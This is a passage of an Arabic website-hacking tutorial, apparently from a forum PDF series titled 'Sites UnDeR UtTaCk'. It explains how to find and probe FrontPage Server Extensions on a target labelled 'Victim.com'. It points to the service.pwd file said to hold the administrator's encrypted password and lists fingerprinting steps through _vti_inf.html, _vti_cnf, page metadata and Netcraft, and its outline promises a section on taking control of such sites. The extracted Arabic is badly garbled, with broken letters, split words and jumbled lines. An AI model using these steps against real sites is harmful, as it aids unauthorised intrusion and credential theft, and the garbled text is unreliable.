‫‪$$$$$$$$$$$$$$$$$$$‬‬

‫ﻣﺎاﻟﺬي ﯾﺠﺐأنﺗﻌ ﺮﻓﻪﻗﺒ ﻞﻗ ﺮا ءة ﻫﺬااﻟﺪرس ‪:‬‬

‫*اﻻﻟﻤﺎمﺑﺎﻻﻧﺠﻠﯿﺰﯾﺔ ‪.‬‬
‫ﻗﻪ ‪.‬‬
‫ﺘ ﺮا‬
‫ـ ‪ FrontPage Server Extensions‬وﻟﯿ ﺲﻛﯿﻔﯿﺔا ﺧ‬ ‫*ﻗ ﺮا ءةاﻟﻤﺰﯾﺪ ﻋﻦاﻟ‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊﺑ ﺮﻧﺎﻣ ﺞ ‪. Microsoft Office FrontPage‬‬ ‫*ﻛﯿﻔﯿﺔاﻟ‬
‫ـ ‪. CHMOD‬‬ ‫ﺘﻌﺎﻣ ﻞ ﻣﻊاﻟ‬
‫*ﻛﯿﻔﯿﺔاﻟ‬
‫ـ ‪. Telnet‬‬ ‫ﺘﻌﺎﻣ ﻞ ﻣﻊاﻟ‬
‫*ﻛﯿﻔﯿﺔاﻟ‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊﺑ ﺮوﺗﻮﻛﻮ ل ‪. HTTP‬‬ ‫*ﻛﯿﻔﯿﺔاﻟ‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ تاﻟﻌﻼﺋﻘﯿﺔ ‪. SQL‬‬‫*ﻛﯿﻔﯿﺔاﻟ‬
‫ﺘﻲﺗﻌﻤ ﻞﺑﻨﺎ ﺣﯿﺔاﻟﺨﺎدم ‪Server Side Scripting‬‬‫ﺘﻌﺎﻣ ﻞ ﻣﻊأ ﺣﺪﻟﻐﺎ تاﻟﻮﯾﺐ واﻟ‬ ‫*ﻛﯿﻔﯿﺔاﻟ‬
‫‪. Language‬‬

‫ﺘﻪاﻟﺒ ﺮﻣﺠﺔ وادارة وﺗ ﺤﻠﯿ ﻞاﻟﻨﻈﻢ واﻟﺸﺒﻜﺎ ت و‬ ‫ﺘ ﺮ ق ﻣﺎﻫﻮإﻻاﻧﺴﺎن وﻇﯿﻔ‬


‫ًﺑﺄﻧﻲاؤﻣﻦﺑﺄناﻟﻤﺨ‬ ‫واذﻛ ﺮأ ﺧﯿ ﺮا‬
‫ﻟﯿ ﺲاﻧﺴﺎن ﻫﻤﻪ ﻫﻮ ﻣﻌ ﺮﻓﺔاﻟﻘﻠﯿ ﻞ‬
‫ﺘﺴﻜﻊ‬ ‫ﻗ ﺖﻓﻲاﻟﺪردﺷﺔ واﻟ‬ ‫ﺘﺨ ﺮﯾﺐ واﻟﻌﺒﺚﺑﻤﺎﺗﻌﺐﺑﻪاﻵ ﺧ ﺮون وﺗ ﻀﯿﯿﻊاﻟﻮ‬ ‫ﺘﻲﺗﺴﺎﻋﺪهﻓﻲاﻟ‬ ‫ﻣﻦاﻷﻣﻮراﻟ‬
‫ـ ‪. Screen Capture‬‬ ‫ﺘﺎجﻟ‬‫ً وﻻ ﯾ ﺤ‬‫ﻗﻮﻟﻪ ﺳﯿﻜﻮن وا ﺿ ﺤﺎ‬
‫ﺘ ﺮ ضﺑﺄن ﻣﺎأ‬ ‫ﺘ ﺮﻧ ﺖ ‪ ،‬وﻟﺬاﻓﺎﻓ‬‫ﺑﻤﻘﺎﻫﻲاﻻﻧ‬

‫@ ﺧ ﺮﯾﻄﺔاﻟﻤﻮ ﺿﻮ ع ‪:‬‬
‫><><><><><><><><><><><><><><><><><><><><><><><><><><><><><‬

‫ﺘﺴﻔﯿﺪه ﻋﻨﺪﻗ ﺮا ءةاﻟﻤﻮ ﺿﻮ ع ؟‬ ‫‪ .‬ﻣﺎاﻟﺬي ﺳ‬


‫‪ .‬ﻣﻘﺪﻣﺔ‬
‫ـ ‪ FrontPage Server Extensions‬؟‬ ‫‪ .‬ﻣﺎ ﻫﻮاﻟ‬
‫ـ ‪ FrontPage Extension Server‬؟‬ ‫‪ .‬ﻣﺎ ﻫﻲ آﻟﯿﺔ ﻋ ﻤ ﻞاﻟ‬
‫ـ ‪FrontPage Extension Server‬‬ ‫‪.‬ﻛﯿﻔﯿﺔاﻻﺗﺼﺎ لﺑ‬
‫ـ ‪FrontPage‬أم ﻻ‬ ‫ﻗﻊ ﯾﺪﻋﻢاﻟ‬ ‫‪.‬ﻛﯿﻔﯿﺔ ﻣﻌ ﺮﻓﺔ ﻫ ﻞاﻟﻤﻮ‬
‫ﺘﻐﻼﻟﻪﻟﯿﺼﺒﺢﻓﻲ ﺻﻼ ﺣﻚ‬ ‫‪.‬ﻛﯿﻔﯿﺔاﺳ‬
‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬

‫ﺘﻔﯿﺪه ﻋﻨﺪﻗ ﺮاءﺗﻚﻟﻠﻤﻮ ﺿﻮ ع ؟‬


‫ﺘﺴ‬‫@ ﻣﺎاﻟﺬي ﺳ‬

‫ـ ‪. FrontPage Server Extensions‬‬ ‫ﺘﻌ ﺮ ف ﻣﺎ ﻫﻮاﻟ‬


‫*ﺳ‬
‫* آﻟﯿﺔ ﻋﻤﻠﻪ ‪.‬‬
‫ﻗﻊ ‪.‬‬ ‫*ﻛﯿﻔﯿﺔ ﺟﻤﻊاﻟﻤﻌﻠﻮﻣﺎ تاﻟﺨﺎﺻﺔﺑﺄي ﻣﻮ‬
‫ﺘﻔﺎدة ﻣﻨﻪ ﻋﻨﺪاﻻﺗﺼﺎ لﺑﺎﻟﺨﺎدماﻟﺨﺎ صﺑﻪ ‪.‬‬
‫*ﺑﻌ ﺾاﻟﻄ ﺮ قﻟﻼﺳ‬

‫‪١ ٣٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫@ ﻣﻘﺪﻣﺔ ‪:‬‬

‫ﺘﺨﻔﯿ ﻀﺎ ت‬
‫ﺘﺠﺪﻫﻢ ﯾﻘﺪﻣﻮناﻟﻌ ﺮو ض واﻟ‬
‫ﺘﻰ ﺷﺒ ﻞاﻟ ﺮا ﺣﺔﻟﻌﻤﻼﺋﻬﺎ ‪،‬ﻓ‬‫ﺘﺴﻜﯿﻦﺑﺄﻧﻮاﻋﻬﺎﺗﻮﻓﯿ ﺮ ﺷ‬ ‫ﺗﺴﻌﻰ ﺷ ﺮﻛﺎ تاﻟ‬
‫ـ ‪ PHP‬و‬ ‫ﻻر ﺿﺎ ءاﻟﻌﻤﻼ ء ﻣﺜ ﻞ دﻋﻢﻟ‬
‫‪ CGI‬و ‪ Perl‬و ‪ SSL‬و ‪ FTP‬و ‪. SQL‬‬

‫ﻗﻌﻬﻢﻫﻮ ‪Microsoft‬‬ ‫ﺘﺼﻤﯿﻢ ﻣﻮا‬ ‫ﻗﻊ ‪Webmasters‬ﻓﺈناﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻤﻔ ﻀ ﻞﻟﻬﻢﻟ‬ ‫وﺑﺎﻟﻨﺴﺒﺔﻟﻤﺪار ءاﻟﻤﻮا‬
‫‪ Office FrontPage‬واﻟﺬيﻛﻤﺎ ﻫﻮ ﻣﺒﯿﻦ ﯾﺄﺗﻲ‬
‫ﺘﻌﻤﺎﻟﻪﻛﻤﺎاﻧﻪ ﯾﻮﻓ ﺮﺑﻌ ﺾاﻟﺒ ﺮﻣﺠﯿﺎ ت ﻣﺜ ﻞ ﻋﺪاداﻟﺰوار ‪ ،‬وﻟﺬا‬ ‫ﺘﻤﯿﺰﺑﺴﻬﻮﻟﺔا ﺳ‬ ‫ﻣﻊ ﺣﺰﻣﺔ ‪، Office‬اذ ﯾ‬
‫ﺘﺴﻜﯿﻦ دﻋﻢﻛﺎﻣ ﻞﻟﻠﺒ ﺮﻧﺎﻣ ﺞ ‪.‬‬ ‫ﺗﻘﺪم ﺷ ﺮﻛﺎ تاﻟ‬

‫ـ ‪ FrontPage Server Extensions‬؟‬


‫@ ﻣﺎ ﻫﻮاﻟ‬

‫ﺘﻲأﺗ ﺖﺑﻌﺪ ﺣﺰﻣﺔاﻻﺻﺪاراﻟﺜﺎﻧﻲ (‬


‫ً ﻋﻦاﻟ ﺤﺰماﻟ‬
‫) ﻣﻼ ﺣﻈﺔ ‪ :‬ﺳﺄﺗﻜﻠﻢ ﺣﺎﻟﯿﺎ‬

‫ﺘﻲﻟﻬﺎﻗﺎﻟﺒﯿﺔ‬
‫ﺘﺴﻜﯿﻦاﻟ‬
‫ﺘﻬﺎﻓﻲاﻟﺨﺎدم ‪Server‬اﻟﺨﺎ صﺑﺸ ﺮﻛﺔاﻟ‬
‫ﺘﻢﺗﺜﺒﯿ‬
‫ﻫﻮ ﻋﺒﺎرة ﻋﻦ ﺣﺰﻣﺔ ﻣﻦاﻟﺒ ﺮاﻣ ﺞ ﯾ‬
‫ﻟﺪﻋﻢﺑﻌ ﺾاﻟﺨﺼﺎﺋ ﺺ ‪.‬‬

‫ﺘﺜﺒﯿ ﺖ ﯾﺠﺐاﻧﺸﺎ ء ﻋﺪة ﻣﺠﻠﺪا ت ﻣﻨﻬﺎ ‪:‬‬


‫و ﻋﻨﺪاﻟ‬

‫‪private_/‬‬
‫‪vti_bin_/‬‬
‫‪vti_cnf_/‬‬
‫‪vti_log_/‬‬
‫‪vti_pvt_/‬‬
‫‪vti_txt_/‬‬

‫و ﺳﺄﺗﻜﻠﻢ ﻋﻦ وﻇﯿﻔﺔﻛ ﻞ ﻣﺠﻠﺪ ﯾﻬﻤﻨﺎ ‪:‬‬

‫*اﻟﻤﺠﻠﺪ _‪: vti_bin‬‬

‫ﺘﻮاﺟﺪﺑﺪا ﺧﻠﻪ ﻣﺠﻠﺪان ﻫﻤﺎ ‪:‬‬


‫وﯾ‬

‫ﺘﺎنﺗﺸﯿ ﺮانإﻟﻰاﻟﻤﺠﻠﺪ _‪( vti_bin‬‬


‫) ﻣﻼ ﺣﻈﺔ ‪:‬اﻟﻨﻘﻄ‬

‫‪/vti_adm_/..‬‬
‫‪/vti_aut_/..‬‬

‫ﺘﻔﺎدة ﻣﻨﻪاذاﻟﻢﺗ ﺤﺼ ﻞ‬
‫ﺘﻄﯿﻊاﻻﺳ‬
‫اﻟﺜﺎﻧﻲ ﻻ ﯾﻬﻤﻨﺎﺑﻘﺪر ﻣﺎ ﯾﻬﻢاﻟﻤﺠﻠﺪاﻷو لاذأﻧﻪاﻟﺨﺎ صﺑﺎﻟﻤﺸ ﺮ ف وﻻﺗﺴ‬
‫ﻋﻠﻰﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺨﺎﺻﺔﺑﻪ ‪.‬‬
‫ﻛﻤﺎ ﯾﻮﺟﺪ ﻣﻠﻔﺎنﻫﻤﺎ ‪:‬‬

‫‪١ ٣١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪shtml.exe/..‬‬
‫‪fpcount.exe/..‬‬

‫*اﻟﻤﺠﻠﺪ _‪: vti_pvt‬‬

‫ﺘﺎﻟﯿﺔ ‪:‬‬
‫ﺘﻮاﺟﺪﺑﺪا ﺧﻠﻪ ﻋﺪة ﻣﻠﻔﺎ ت ﻣﺎ ﯾﻬﻤﻨﺎ ﻣﻨﻬﺎﻫﻮاﻟﻤﻠﻔﺎ تاﻟ‬
‫وﯾ‬

‫ﺘﻮاﺟﺪاﻟﻤﻌ ﺮ ف وﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺨﺎ ﺻﺔﺑﺎﻟﻤﺸ ﺮ ف ﻣﺸﻔ ﺮةﺑﻤﻘﯿﺎس‬ ‫‪-‬اﻟﻤﻠ ﻒ ‪ : service.pwd‬وﻓﯿﻪ ﯾ‬


‫‪. DES‬‬
‫ﺘﻮاﺟﺪاﻟﻤﻌ ﺮﻓﯿﻦ ﻣﻦ ﻣﺸ ﺮﻓﯿﻦ و ‪. authors‬‬ ‫‪-‬اﻟﻤﻠ ﻒ ‪ : service.grp‬وﻓﯿﻪ ﯾ‬
‫ﺘﻲﺗﻢﺗ ﺤﻤﯿﻠﻬﺎ ﻋﻠﻰ‬‫ﺘﻮاﺟﺪ ﻣﺴﺎرا تاﻟﻤﻠﻔﺎ تاﻟ‬
‫‪ -‬ﻣﻠﻔﻲ ‪ deptodoc.btr‬و ‪ : doctodep.btr‬وﻓﯿﻪ ﯾ‬
‫ﺘﻄﯿﻊ ﻣﻌ ﺮﻓﺔاﻟﻤﻠﻔﺎ ت‬‫ﺘﺴ‬ ‫ﺘﻨﺰﯾﻠﻪﻓ‬
‫اﻟﺨﺎدم ‪،‬ﻓﺎذاﻗﻤ ﺖﺑ‬
‫ﻗﻊ ‪.‬‬
‫اﻟﻤﻮﺟﻮدةﺑﺎﻟﻤﻮ‬

‫ﻗﻊ ﻣﻠ ﻒ ‪htaccess.‬‬
‫ﺘﻮﯾﺎ تاﻟﻤﺠﻠﺪاذ ﯾﻮﺟﺪﻓﻲاﻟﻤﺠﻠﺪاﻟ ﺮﺋﯿﺴﻲﻟﻠﻤﻮ‬ ‫ﺘﻄﯿﻊ ﻣﻌﺎﯾﻨﺔ ﻣ ﺤ‬‫وﻓﻲاﻟﻐﺎﻟﺐ ﻻﺗﺴ‬
‫ﯾﻘﻮمﺑﻤﻨﻊاﻟﺠﻤﯿﻊ )اﻟﻤﺎﻟﻚ واﻟﻤﺠﻤﻮﻋﺔ و‬
‫ﺘﻮﯾﺎﺗﻪ ‪.‬‬ ‫اﻟﺰوار ( ﻣﻦ ﻣﻌﺎﯾﻨﺔاﻟﻤﺠﻠﺪ و ﻣ ﺤ‬

‫ﺘﺒ ﺮﺛﻐ ﺮة وﻟﻜﻦ ﺿﻌ ﻒ ﻣﻦاﻟﻨﺎ ﺣﯿﺔ (‬


‫) ﻣﻼ ﺣﻈﺔ ‪:‬ان ﻋﺪم و ﺿﻊأي ﺻﻼ ﺣﯿﺔ ﻋﻠﻰاﻟﻤﺠﻠﺪﻻ ﯾﻌﻨﻲﺑﺄﻧﻬﺎﺗﻌ‬

‫*اﻟﻤﺠﻠﺪ _‪: private‬‬

‫ﺘﻮاﺟﺪﺑﺪا ﺧﻠﻪ ﻣﻠ ﻒ وا ﺣﺪﻓﻘﻂﻫﻮ ‪. htaccess.‬‬


‫وﯾ‬

‫ـ ‪ FrontPage Extension Server‬؟‬


‫@ ﻣﺎ ﻫﻲ آﻟﯿﺔ ﻋﻤ ﻞاﻟ‬

‫ـ ‪. HTTP‬‬
‫ـ ‪ FrontPage Extension Server‬ﻋﻠﻰﺑ ﺮوﺗﻮﻛﻮ لاﻟ‬
‫ﺘﻤﺪاﻻﺗﺼﺎ لﺑﯿﻦاﻟﻌﻤﯿ ﻞ واﻟ‬
‫ﯾﻌ‬

‫ﺘﻢارﺳﺎ ل ﻃﻠﺐ ‪Request‬‬ ‫ـ ‪FrontPage‬ﻓﺎﻧﻪ ﯾ‬ ‫ﻓﻠﻮاردﻧﺎ ﻣﻌﺎﯾﻨﺔ ﻋﺪاداﻟﺰوار ﻋﻦ ﻃ ﺮﯾ ﻖﺑ ﺮﻧﺎﻣ ﺞاﻟ‬


‫ـ ‪FrontPage Extension Server‬‬ ‫ﻟﻠﺨﺎدمﺛﻢ ﯾﻤ ﺮرهاﻟﺨﺎدمﺑﺎﻟ‬
‫ـ‬
‫ﺘﺎﻟﻲﺑﺒ ﺮﻣﺠﯿﺎ تاﻟﺨﺎدم ﻣﺜ ﻞ ‪ ، fpcount.exe‬و ﻣﻦﺛﻢ ﯾﻜ ﺮرﺗﻤ ﺮﯾ ﺮه ﻣ ﺮةأ ﺧ ﺮىإﻟﻰاﻟ‬ ‫واﻟﺬي ﯾﻤ ﺮرهﺑﺎﻟ‬
‫‪ Extension Server‬وإﻟﻰاﻟﺨﺎدم و ﯾﻈﻬ ﺮاﻟﻤﺨ ﺮﺟﺎ ت‬
‫ﺘﻢ ﻋﺒ ﺮ ﺟﺪار ﻧﺎر ‪.‬‬ ‫ًان ﻫﺬهاﻻﺗﺼﺎﻻ تﺗ‬ ‫ـاﻟﻌﻤﯿ ﻞ ‪ ،‬ﻋﻠﻤﺎ‬
‫ﻟ‬

‫ـ ‪: FrontPage Extension Server‬‬


‫@ﻛﯿﻔﯿﺔاﻻﺗﺼﺎ لﺑ‬

‫ـ ‪ FrontPage‬و‬ ‫ﺘﺠﺪﻫﺎﺗﺪﻋﻢ ﺧﺪﻣﺔاﻟ‬‫ﺘﺴﻜﯿﻦﺗﺴﻌﻰﻟ ﺮا ﺣﺔاﻟﻌﻤﻼ ء ‪،‬ﻓ‬ ‫ًانأﻏﻠﺐ ﺷ ﺮﻛﺎ تاﻟ‬ ‫ﻛﻤﺎ ذﻛ ﺮﻧﺎ ﺳﺎﺑﻘﺎ‬
‫ًﺑﺄﻧﻬﺎ‬‫ﻗﻊ ﻋﻠﻤﺎ‬‫ﺘ ﺤﻤﯿ ﻞاﻟﺼﻔ ﺤﺎ تﻟﻠﻤﻮ‬ ‫ذﻟﻚﻟ‬
‫ﺘﻲ‬ ‫ً ﻋﻠﻰاﻟﺒ ﺮﻣﺠﯿﺎ تاﻟ‬
‫ﺘﻤﺎدا‬
‫ﺘﺼﻔﺢاﻋ‬ ‫ـ ‪ FTP‬وﺗ ﺤﻤﯿ ﻞاﻟﻤﻠﻔﺎ ت واﻧﺸﺎ ءاﻟﻤﺠﻠﺪا ت ﻋﺒ ﺮاﻟﻤ‬ ‫ﺗﺪﻋﻢﺑ ﺮوﺗﻮﻛﻮ لاﻟ‬
‫ﺗﻌﻤ ﻞﺑﻨﺎ ﺣﯿﺔاﻟﺨﺎدم ‪.‬‬
‫ـ ‪: FrontPage Extension Server‬‬ ‫ﺘﺎﻟﻲﻟﻤﻌ ﺮﻓﺔﻛﯿﻔﯿﺔاﻻﺗﺼﺎ لﺑﺎﻟ‬ ‫ﺘﻨﻔﯿﺬاﻟ‬‫واﻵنﻗﻢﺑ‬

‫‪١ ٣٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﯿﺔإﻻﻓﻲﺑﻌ ﺾاﻟﻨﻘﺎط‬
‫ً ﻋﻦاﻟ ﺤﺰماﻟﺒﺎ‬
‫ﺘﻠ ﻒأﺑﺪا‬
‫ﺘﻲ ﻻﺗﺨ‬
‫ـ ‪ XP‬واﻟ‬
‫ً ﻋﻦ ﺣﺰﻣﺔاﻟ‬
‫) ﻣﻼ ﺣﻈﺔ ‪ :‬ﺳﺄﺗﻜﻠﻢ ﺣﺎﻟﯿﺎ‬
‫اﻟﺸﻜﻠﯿﺔ (‬

‫ً ﻣﻊ ﺣﺰﻣﺔ ‪. Office‬‬ ‫ـ ‪ FrontPage‬واﻟﺬي ﯾﺄﺗﻲ ﻣ ﺮﻓﻘﺎ‬ ‫ﺘﺸﻐﯿ ﻞﺑ ﺮﻧﺎﻣ ﺞاﻟ‬ ‫*ﻗﻢﺑ‬


‫ﺘﯿﺎر ‪. Open Web‬‬ ‫* ﻣﻦﻗﺎﺋ ﻤﺔ ‪File‬ﻗﻢﺑﺎ ﺧ‬
‫*ﻗﻢﺑﺎ ﺿﺎﻓﺔاﻟﻤﻌ ﺮ ف وﻛﻠﻤﺔاﻟﻤ ﺮور )اﻷ ﺻﻠﯿﺔ وﻟﯿﺴ ﺖاﻟﻤﺸﻔ ﺮة ( ‪.‬‬
‫ﺘﻌﺪﯾ ﻞﻓﻲاﻟﻤﻠﻔﺎ ت و‬‫ﺘ ﺤﻤﯿ ﻞ واﻟ‬‫ﺘﻄﯿﻊاﻟ‬‫ﻗﻊﻛﻠﻬﺎ و ﻋﻨﺪﻫﺎﺗﺴ‬ ‫*اذاﻛﺎﻧ ﺖ ﺻ ﺤﯿ ﺤﺔ ﺳﯿﻈﻬ ﺮﻟﻚاﻟﺨﺎدم ﻣﻠﻔﺎ تاﻟﻤﻮ‬
‫اﻟﻤﺠﻠﺪا ت و ﻣﻌﺎﯾﻨﺔاﻟﺸﻔ ﺮةاﻟﻤﺼﺪرﯾﺔ‬
‫ﻟﻠﻤﻠﻔﺎ ت ‪.‬‬
‫ﻗﻊ ﻻ ﯾﺪﻋﻢاﻟﺨﺪﻣﺔأوأناﻟﻤﻌ ﺮ فأوﻛﻠﻤﺔاﻟﻤ ﺮور ﺧﺎ ﻃﺌﺔ و‬ ‫ﺘﻢاﻟﻌﻤﻠﯿﺔﺑﻨﺠﺎ حﻓﻬﺬا ﯾﻌﻨﻲﺑﺄناﻟﻤﻮ‬ ‫*اذاﻟﻢﺗ‬
‫ﺘﻬﺎﻓﻲ و ﺿﻌﯿﺔاﻟﻘ ﺮا ءة و ﻻ‬ ‫ﯾﻄﻠﺐ ﻣﻨﻚ ﻣﻌﺎﯾﻨ‬
‫ﻗﻊ ‪.‬‬ ‫ﺘﻲ ﯾ ﺤﻮﯾﻬﺎاﻟﻤﻮ‬ ‫ﯾﻈﻬ ﺮﻟﻚاﻟﺸﻔ ﺮةاﻟﻤﺼﺪرﯾﺔاﻷ ﺻﻠﯿﺔ وﻻاﻟﻤﺠﻠﺪا ت واﻟﻤﻠﻔﺎ تاﻟ‬

‫ـ ‪FrontPage‬أم ﻻ ‪:‬‬
‫ﻗﻊ ﯾﺪﻋﻢاﻟ‬
‫@ﻛﯿﻔﯿﺔ ﻣﻌ ﺮﻓﺔ ﻫ ﻞاﻟﻤﻮ‬

‫ﻗﻊﻟﺪﻋﻢاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ﻧﺬﻛ ﺮ ﻣﻨﻬﺎ ‪:‬‬


‫ﯾﻮﺟﺪاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻄ ﺮ قﻟﻤﻌ ﺮﻓﺔﻗﺎﺑﻠﯿﺔاﻟﻤﻮ‬

‫ﺘﺜﺒﯿ ﺖ ‪:‬‬
‫* ﻣﻌﺎﯾﻨﺔ ﻣﻠ ﻒ ﻧﺠﺎ حاﻟ‬

‫ﻗﻊ ﻻ ﯾﺪﻋﻢاﻟﺨﺪﻣﺔ ‪،‬ﻛﻤﺎأﻧﻪ ﻻ‬


‫) ﻣﻼ ﺣﻈﺔ ‪:‬ﻗﺪ ﻻﺗﺠﺪ ﻣﻠ ﻒ _‪ vti_inf.html‬وﻟﻜﻦ ﻫﺬا ﻻ ﯾﻌﻨﻲأناﻟﻤﻮ‬
‫ﺘﺒ ﺮﺛﻐ ﺮة (‬
‫ﯾﻌ‬

‫ـ ‪FrontPage‬أم ﻻ ‪.‬‬ ‫ﻗﻊﺗ ﺮﯾﺪأنﺗﻌ ﺮ ف ﻫ ﻞاﻟﺨﺎدماﻟﺨﺎ صﺑﻪ ﯾﺪﻋﻢاﻟ‬


‫‪-‬ﻗﻢﺑﺰﯾﺎرةأي ﻣﻮ‬
‫ﻗﻊ ‪ ،‬ﻣﺜﺎ ل ‪:‬‬
‫ﻗﻪﺑﻌﻨﻮاناﻟﻤﻮ‬
‫ﺘﺼﻔﺢ و ذﻟﻚﺑﺎرﻓﺎ‬‫‪-‬ﻗﻢﺑﻤﻌﺎﻧﯿﺔ ﻣﻠ ﻒ _‪vti_inf.html‬ﺑﻮاﺳﻄﺔاﻟﻤ‬

‫‪http://www.Victim.com/_vti_inf.html‬‬

‫ﺘﺠﺪ ﺟﻤﻠﺔ ‪، FrontPage Configuration Information‬ﻓﻬﺬا ﻣﻌﻨﺎه‬


‫‪ -‬و ﻋﻨﺪ ﻣﻌﺎﯾﻨﺔاﻟﺼﻔ ﺤﺔ ﺳ‬
‫ﺘﻬﺎ‬
‫ـ ‪FrontPage Extension Server‬ﻗﺪﺗﻢﺗﺜﺒﯿ‬ ‫أن ﺣﺰﻣﺔاﻟ‬
‫ﻓﻲاﻟﺨﺎدمﺑﻨﺠﺎ ح ‪.‬‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫وﻟﻤﻌ ﺮﻓﺔا ﺻﺪارةاﻟﺨﺪﻣﺔﻗﻢﺑﺎﻟ‬

‫ﺘﯿﺎر ‪. Source Code‬‬‫‪-‬ﻗﻢﺑﺎﻟﻨﻘ ﺮﺑﺰراﻟﻔﺄرةاﻷﯾﻤﻦ ﻋﻠﻰاﻟﺼﻔ ﺤﺔ ‪،‬ﺛﻢﻗﻢﺑﺎ ﺧ‬


‫‪-‬ﻗﻢﺑﺎﻟﺒ ﺤﺚ ﻋﻦ ‪ "FPVersion="Version‬ﺣﯿﺚ ‪Version‬ﺗﺸﯿ ﺮﻟﻼﺻﺪاراﻟﺨﺎ صﺑﺎﻟﺨﺪﻣﺔ ‪.‬‬

‫* ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﺠﻠﺪ _‪: vti_cnf‬‬

‫ـ ‪FrontPage‬أم ﻻ ‪.‬‬ ‫ﻗﻊﺗ ﺮﯾﺪأنﺗﻌ ﺮ ف ﻫ ﻞاﻟﺨﺎدماﻟﺨﺎ صﺑﻪ ﯾﺪﻋﻢاﻟ‬‫‪-‬ﻗﻢﺑﺰﯾﺎرةأي ﻣﻮ‬


‫ﻗﻊ ‪ ،‬ﻣﺜﺎ ل ‪:‬‬‫ﻗﻪﺑﻌﻨﻮاناﻟﻤﻮ‬
‫ﺘﺼﻔﺢ و ذﻟﻚﺑﺎرﻓﺎ‬ ‫‪-‬ﻗﻢﺑﻤﻌﺎﻧﯿﺔاﻟﻤﺠﻠﺪﺑﻮاﺳﻄﺔاﻟﻤ‬

‫‪http://www.Victim.com/_vti_cnf‬‬

‫‪١ ٣٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﯿﺎر ‪. Source Code‬‬


‫‪-‬ﻗﻢﺑﺎﻟﻨﻘ ﺮﺑﺰراﻟﻔﺄرةاﻷﯾﻤﻦ ﻋﻠﻰاﻟﺼﻔ ﺤﺔ ‪،‬ﺛﻢﻗﻢﺑﺎ ﺧ‬
‫ﺘﺎﻟﯿﺔ ‪:‬‬
‫‪-‬ﻗﻢﺑﺎﻟﺒ ﺤﺚ ﻋﻦاﻟﺸﻔ ﺮةاﻟ‬

‫‪vti_generator:Programe‬‬

‫ﺘﻨﺎ ﻫﻮ ‪Microsoft‬‬
‫‪ -‬ﺣﯿﺚ ‪ Programe‬ﯾﺸﯿ ﺮﻟﻨﻮ عاﻟﺒ ﺮﻧﺎﻣ ﺞ وا ﺻﺪارﺗﻪ و ﺳﯿﻜﻮنﻓﻲ ﺣﺎﻟ‬
‫‪ FrontPage X‬واﻻ ﺻﺪارةاﻟﺨﺎﺻﺔﺑﻪ ﻫﻲ ‪. X‬‬

‫*اﻟﻜﺸ ﻒ ﻋﻦاﻟﺸﻔ ﺮةاﻟﻤﺼﺪرﯾﺔﻟﻠﺼﻔ ﺤﺔ ‪:‬‬

‫ـ ‪FrontPage‬أم ﻻ ‪.‬‬ ‫ﻗﻊﺗ ﺮﯾﺪأنﺗﻌ ﺮ ف ﻫ ﻞاﻟﺨﺎدماﻟﺨﺎ صﺑﻪ ﯾﺪﻋﻢاﻟ‬


‫‪-‬ﻗﻢﺑﺰﯾﺎرةأي ﻣﻮ‬
‫ﺘﯿﺎر ‪. Source Code‬‬ ‫‪-‬ﻗﻢﺑﺎﻟﻨﻘ ﺮﺑﺰراﻟﻔﺄرةاﻷﯾﻤﻦ ﻋﻠﻰاﻟﺼﻔ ﺤﺔ ‪،‬ﺛﻢﻗﻢﺑﺎ ﺧ‬
‫ﺘﺎﻟﯿﺔ ‪:‬‬
‫‪-‬ﻗﻢﺑﺎﻟﺒ ﺤﺚﺑﯿﻦﺗ ﺮﻣﯿﺰياﻟ ﺮأس >‪ <Head></Head‬ﻋﻦاﻟﺸﻔ ﺮةاﻟ‬

‫>‪<"Meta Name="GENERATOR" Content="Programe‬‬

‫‪ -‬ﺣﯿﺚ ‪ Programe‬ﯾ ﺮﻣﺰﻟﻨﻮ عاﻟﺒ ﺮﻧﺎﻣ ﺞ واذاﻛﺎناﻟﺒ ﺮﻧﺎﻣ ﺞﻫﻮ ‪Microsoft FrontPage X.0‬‬
‫ﻗﻊ ﯾﺪﻋﻢاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ و‬ ‫ﺘﺒﯿﻦﻟﻨﺎﺑﺄناﻟﺨﺎدماﻟﺨﺎ صﺑﺎﻟﻤﻮ‬
‫ﯾ‬
‫اﻻﺻﺪارةاﻟﺨﺎ ﺻﺔﺑﻪ ﻫﻲ ‪. X‬‬

‫ﻗﻊ ‪: NetCraft‬‬
‫* ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ‬

‫ﻗﻊ ‪. NetCraft.net‬‬ ‫‪-‬ﻗﻢﺑﺰﯾﺎرةاﻟﻤﻮ‬


‫ـ ‪. //:http‬‬ ‫ًاﻟ‬
‫ﺘﺜﻨﯿﺎ‬
‫ﻗﻊ ﻣﺴ‬‫ﺘﺎﺑﺔ ﻋﻨﻮاناﻟﻤﻮ‬ ‫‪-‬ﻗﻢﺑﻜ‬
‫ﺘﻈ ﺮﺑ ﻀﻊﺛﻮاﻧﻲ ‪.‬‬ ‫‪-‬اﻧ‬
